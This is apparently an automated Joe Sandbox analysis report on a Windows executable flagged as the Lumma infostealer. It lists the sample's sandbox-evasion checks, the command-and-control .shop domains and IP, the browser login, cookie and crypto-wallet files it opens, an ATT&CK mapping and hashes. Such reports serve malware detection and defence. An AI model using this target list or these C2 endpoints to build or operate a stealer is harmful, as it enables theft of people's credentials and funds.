            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSection loaded: uxtheme.dllJump to behavior
            Source: rwsNDpQSKZ.exeStatic PE information: More than 7058 > 100 exports found
            Source: rwsNDpQSKZ.exeStatic file information: File size 2362184 > 1048576
            Source: rwsNDpQSKZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: rwsNDpQSKZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: rwsNDpQSKZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: rwsNDpQSKZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: rwsNDpQSKZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: rwsNDpQSKZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: rwsNDpQSKZ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: c:\jenkins\workspace\Client\Client\Windows\release\Bin\Release\ZoomOutlookMAPI.pdb source: rwsNDpQSKZ.exe
            Source: rwsNDpQSKZ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: rwsNDpQSKZ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: rwsNDpQSKZ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: rwsNDpQSKZ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: rwsNDpQSKZ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CDE020 __EH_prolog3,CreateFileW,CloseHandle,LoadLibraryW,LoadLibraryW,FreeLibrary,GetCurrentProcessId,LoadLibraryW,GetProcAddress,GetProcAddress,?Unlock@CState@Cmm@@QAEXXZ,?Unlock@CState@Cmm@@QAEXXZ,FreeLibrary,0_2_00CDE020
            Source: rwsNDpQSKZ.exeStatic PE information: section name: .PROPSEC
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CE5333 push ecx; ret 0_2_00CE5346
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CE2106 __EH_prolog3_GS,GetPrivateProfileStringW,0_2_00CE2106
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CDC84B SHGetFolderPathW,PathAppendW,GetPrivateProfileIntW,CreateThread,CreateEventW,GetCurrentThreadId,ResumeThread,0_2_00CDC84B
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeSystem information queried: FirmwareTableInformationJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeAPI coverage: 0.0 %
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe TID: 6152Thread sleep time: -150000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe TID: 6152Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CBE0BE FindFirstFileW,FindClose,0_2_00CBE0BE
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00D067D0 FindFirstFileExW,0_2_00D067D0
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00C628A3 SetLastError,FindFirstFileW,RemoveDirectoryW,?Unlock@CState@Cmm@@QAEXXZ,GetProcessHeap,HeapFree,FindNextFileW,GetProcessHeap,HeapFree,FindClose,SetLastError,0_2_00C628A3
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00C63070 cmm_fs_find_first,cmm_wstr_ncpy,FindFirstFileW,0_2_00C63070
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CDD988 __EH_prolog3,GetSystemInfo,0_2_00CDD988
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1837241948.0000000003063000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1789398984.0000000003062000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1804407153.0000000003063000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1789813074.0000000003063000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1836784813.0000000003060000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1836784813.0000000003034000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000002.1838245473.0000000003034000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000002.1838350467.0000000003064000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1789281360.0000000003060000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1742844809.000000000306A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CE466A IsDebuggerPresent,OutputDebugStringW,0_2_00CE466A
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CDE020 __EH_prolog3,CreateFileW,CloseHandle,LoadLibraryW,LoadLibraryW,FreeLibrary,GetCurrentProcessId,LoadLibraryW,GetProcAddress,GetProcAddress,?Unlock@CState@Cmm@@QAEXXZ,?Unlock@CState@Cmm@@QAEXXZ,FreeLibrary,0_2_00CDE020
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00D0E5D7 mov esi, dword ptr fs:[00000030h]0_2_00D0E5D7
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00D00FF1 mov eax, dword ptr fs:[00000030h]0_2_00D00FF1
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00D00FAD mov eax, dword ptr fs:[00000030h]0_2_00D00FAD
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CFB48C mov eax, dword ptr fs:[00000030h]0_2_00CFB48C
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CDC00B GetProcessHeap,0_2_00CDC00B
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CDEBBC CloseHandle,CloseHandle,CloseHandle,SetUnhandledExceptionFilter,EnterCriticalSection,LeaveCriticalSection,CloseHandle,0_2_00CDEBBC
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CDEC9F SetUnhandledExceptionFilter,0_2_00CDEC9F
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CE4FE5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00CE4FE5
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CE5791 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CE5791

            HIPS / PFW / Operating System Protection Evasion

            Source: rwsNDpQSKZ.exeString found in binary or memory: outpointsozp.shop
            Source: rwsNDpQSKZ.exeString found in binary or memory: unseaffarignsk.shop
            Source: rwsNDpQSKZ.exeString found in binary or memory: indexterityszcoxp.shop
            Source: rwsNDpQSKZ.exeString found in binary or memory: callosallsaospz.shop
            Source: rwsNDpQSKZ.exeString found in binary or memory: lariatedzugspd.shop
            Source: rwsNDpQSKZ.exeString found in binary or memory: liernessfornicsa.shop
            Source: rwsNDpQSKZ.exeString found in binary or memory: shepherdlyopzc.shop
            Source: rwsNDpQSKZ.exeString found in binary or memory: upknittsoappz.shop
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CBE114 OpenProcessToken,GetLastError,CloseHandle,CloseHandle,FreeSid,GetProcessHeap,HeapFree,FreeSid,CloseHandle,DuplicateTokenEx,GetLastError,AllocateAndInitializeSid,CreateWellKnownSid,GetLastError,GetProcessHeap,HeapAlloc,CreateWellKnownSid,CreateRestrictedToken,AllocateAndInitializeSid,SetTokenInformation,0_2_00CBE114
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CAF2D0 cpuid 0_2_00CAF2D0
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: ?Unlock@CState@Cmm@@QAEXXZ,GetLocaleInfoW,0_2_00D00116
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_00D0922F
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: EnumSystemLocalesW,0_2_00D094D7
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: GetLocaleInfoW,0_2_00D09430
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: EnumSystemLocalesW,0_2_00D095BD
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: EnumSystemLocalesW,0_2_00D09522
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00D09650
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: GetLocaleInfoW,0_2_00D098B0
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00D099D6
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CAC40B __EH_prolog3_GS,CreateNamedPipeW,LocalFree,CreateFileW,??0SBIPCMessage_Connect@@QAE@XZ,GetCurrentProcessId,?SetMsgType@CmmInternelMsg@Cmm@@QAEXH@Z,??1?$CmmMessageTemplate_1@I@Archive@Cmm@@UAE@XZ,0_2_00CAC40B
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00D00155 ?Unlock@CState@Cmm@@QAEXXZ,GetSystemTimeAsFileTime,0_2_00D00155
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CFE1C4 _free,GetTimeZoneInformation,_free,0_2_00CFE1C4
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1837241948.0000000003063000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1804407153.0000000003063000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000002.1838245473.0000000003060000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1836784813.0000000003060000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000002.1838350467.0000000003064000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rwsNDpQSKZ.exe PID: 6820, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1789697826.00000000030BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ":0,"p":"%appdata%\\Electrum-LTC\\wallet
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1789697826.00000000030BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 520},{"t":0,"p":"%appdata%\\ElectronCash]
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1789697826.00000000030BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: llets/JAXX New Version","d":2,"fs":20971
            Source: rwsNDpQSKZ.exe, 00000000.00000002.1838350467.0000000003079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1789398984.0000000003062000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
            Source: rwsNDpQSKZ.exe, 00000000.00000002.1838350467.0000000003079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
            Source: rwsNDpQSKZ.exe, 00000000.00000002.1838350467.0000000003079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1789281360.0000000003045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: rwsNDpQSKZ.exe, 00000000.00000003.1789398984.0000000003062000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, File opened: C:\Users\user\AppData\Roaming\Ledger Live
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, File opened: C:\Users\user\AppData\Roaming\Binance
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, Directory queried: C:\Users\user\Documents
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, Directory queried: C:\Users\user\Documents\DVWHKMNFNN
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, Directory queried: C:\Users\user\Documents\UOOJJOZIRH
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, Directory queried: C:\Users\user\Documents\ZTGJILHXQB
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, Directory queried: C:\Users\user\Documents\BPMLNOBVSB
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, Directory queried: C:\Users\user\Documents\XZXHAVGRAG
            Source: Yara match, File source: 00000000.00000003.1789398984.0000000003062000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000000.00000003.1789467851.0000000003078000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000000.00000003.1789281360.0000000003060000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: Process Memory Space: rwsNDpQSKZ.exe PID: 6820, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match, File source: decrypted.memstr, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: rwsNDpQSKZ.exe PID: 6820, type: MEMORYSTR
            Source: Yara match, File source: sslproxydump.pcap, type: PCAP
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, Code function: 0_2_00C78040 ??0CIPCChannelThread@ssb_ipc@@QAE@W4ChannelMode@1@PAVListener@Channel@1@HPAX@Z,__EH_prolog3,??0Channel@ssb_ipc@@QAE@W4ChannelMode@1@PAVListener@01@PAX@Z,InitializeCriticalSection,0_2_00C78040
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, Code function: 0_2_00C685E0 ?Set_sourceType@CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Response@@QAEXABI@Z,0_2_00C685E0
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, Code function: 0_2_00C68600 ?Get_sourceType@CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Response@@QAEAAIXZ,0_2_00C68600
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, Code function: 0_2_00C5C800 ?Set_userID@CSBMBMessage_Assistant_Broadcast_Unbind_Audio_From_Txchannel_Request@@QAEXABH@Z,0_2_00C5C800
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, Code function: 0_2_00C5C9C7 __EH_prolog3_GS,InitializeCriticalSection,??0?$CStringT@_W@Cmm@@QAE@PB_W@Z,GetCurrentProcessId,??_7CFileName@Cmm@@6B@,?GenChannelName@CIPCChannelThread@ssb_ipc@@SAXABV?$CStringT@_W@Cmm@@IAAV34@@Z,??_7?$CStringT@D@Cmm@@6B@,?_cstring_set@Cmm@@YAXAAV?$CStringT@D@1@IPB_WI@Z,??0?$CStringT@D@Cmm@@QAE@PBD@Z,??0CIPCChannelThread@ssb_ipc@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@W4ChannelMode@1@PAVListener@Channel@1@H@Z,?Start@CIPCChannelThread@ssb_ipc@@QAEHXZ,?Unlock@CState@Cmm@@QAEXXZ,?Now@Time@Cmm@@SA?AV12@XZ,0_2_00C5C9C7
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, Code function: 0_2_00C5C9C0 ??1Listener@Channel@ssb_ipc@@UAE@XZ,0_2_00C5C9C0
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, Code function: 0_2_00CAC9F0 ??0Channel@ssb_ipc@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@W4ChannelMode@1@PAVListener@01@H@Z,__EH_prolog3,0_2_00CAC9F0
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, Code function: 0_2_00CACA40 ??0Channel@ssb_ipc@@QAE@W4ChannelMode@1@PAVListener@01@PAX@Z,__EH_prolog3,0_2_00CACA40
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, Code function: 0_2_00C5CBD0 ??0Listener@Channel@ssb_ipc@@QAE@XZ,0_2_00C5CBD0
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, Code function: 0_2_00CACB50 ?set_listener@Channel@ssb_ipc@@QAEXPAVListener@12@@Z,0_2_00CACB50
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, Code function: 0_2_00C52CF0 ?OnChannelDisconnected@Listener@Channel@ssb_ipc@@UAEXH@Z,0_2_00C52CF0
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, Code function: 0_2_00C5CC8F __EH_prolog3_GS,?_cstring_set@Cmm@@YAXAAV?$CStringT@D@1@IPB_WI@Z,??0?$CStringT@D@Cmm@@QAE@PBD@Z,??0CIPCChannelThread@ssb_ipc@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@W4ChannelMode@1@PAVListener@Channel@1@H@Z,?Start@CIPCChannelThread@ssb_ipc@@QAEHXZ,?Unlock@CState@Cmm@@QAEXXZ,?Now@Time@Cmm@@SA?AV12@XZ,?Unlock@CState@Cmm@@QAEXXZ,0_2_00C5CC8F
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, Code function: 0_2_00C69080 ?Set_txChannelID@CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Response@@QAEXABH@Z,0_2_00C69080
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exe, Code function: 0_2_00C690A0 ?Get_txChannelID@CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Response@@QAEAAHXZ,0_2_00C690A0
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Process Injection | 11 Virtualization/Sandbox Evasion | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 21 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | 141 Security Software Discovery | Remote Desktop Protocol | 31 Data from Local System | 2 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | 1 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 11 Deobfuscate/Decode Files or Information | Security Account Manager | 11 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 113 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 2 Obfuscated Files or Information | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 11 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 34 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            Source | Detection | Scanner | Label | Link
            rwsNDpQSKZ.exe | 39% | ReversingLabs | Win32.Spyware.Lummastealer |
            rwsNDpQSKZ.exe | 45% | Virustotal | | Browse
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            outpointsozp.shop | 19% | Virustotal | | Browse
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            outpointsozp.shop | 188.114.97.3 | true | true | | unknown

            Name | Malicious | Antivirus Detection | Reputation
            https://outpointsozp.shop/api | true | Virustotal: 22%; Avira URL Cloud: malware | unknown
            shepherdlyopzc.shop | true | Virustotal: 19%; Avira URL Cloud: safe | unknown
            lariatedzugspd.shop | true | Virustotal: 19%; Avira URL Cloud: malware | unknown
            upknittsoappz.shop | true | Virustotal: 19%; Avira URL Cloud: safe | unknown
            callosallsaospz.shop | true | Virustotal: 19%; Avira URL Cloud: malware | unknown
            outpointsozp.shop | true | Virustotal: 19%; Avira URL Cloud: safe | unknown
            unseaffarignsk.shop | true | Virustotal: 22%; Avira URL Cloud: safe | unknown
            liernessfornicsa.shop | true | Virustotal: 19%; Avira URL Cloud: safe | unknown
              IP | Domain | Country | Flag | ASN | ASN Name | Malicious
              188.114.97.3 | outpointsozp.shop | European Union | | 13335 | CLOUDFLARENETUS | true
              Joe Sandbox version: 40.0.0 Tourmaline
              Analysis ID: 1483410
              Start date and time: 2024-07-27 11:24:08 +02:00
              Joe Sandbox product: CloudBasic
              Overall analysis duration: 0h 5m 1s
              Hypervisor based Inspection enabled: false
              Report type: full
              Cookbook file name: default.jbs
              Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed: 4
              Number of new started drivers analysed: 0
              Number of existing processes analysed: 0
              Number of existing drivers analysed: 0
              Number of injected processes analysed: 0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode: default
              Analysis stop reason: Timeout
              Sample name: rwsNDpQSKZ.exe
              renamed because original name is a hash value
              Original Sample Name: 5989beb7f9f82b27b741ad6a7b091d7003ed059337563d1f1a39eaf85334fedd.exe
              Detection: MAL
              Classification: mal100.troj.spyw.evad.winEXE@1/0@1/1
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 67%
              • Number of executed functions: 2
              • Number of non-executed functions: 468
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Stop behavior analysis, all processes terminated
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Not all processes where analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size getting too big, too many NtOpenFile calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

              Time | Type | Description
              05:25:07 | API Interceptor | 7x Sleep call for process: rwsNDpQSKZ.exe modified
              No created / dropped files found
              File type: PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit): 6.977847102897721
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name: rwsNDpQSKZ.exe
              File size: 2'362'184 bytes
              MD5: 35e69f7b1869d8e9cf4270b6ec33ef41
              SHA1: 0c89e58442108b0f503b3cc586bccc0ec9d6d9e6
              SHA256: 5989beb7f9f82b27b741ad6a7b091d7003ed059337563d1f1a39eaf85334fedd
              SHA512: 0cc2caee398e9ef4467a7b5957ad39f2427e2f3b175f77aad785b33e72bca49c6904eafd2fabb77779497db7d9bd2f612d8fba0ac0f210b39276632d3c317c31
              SSDEEP: 24576:19LbNaGbnNFKq7DZwoGdcoWTV/7NpBnTchla:1RR7N0kD2owcoWTV/7NpBnTchl
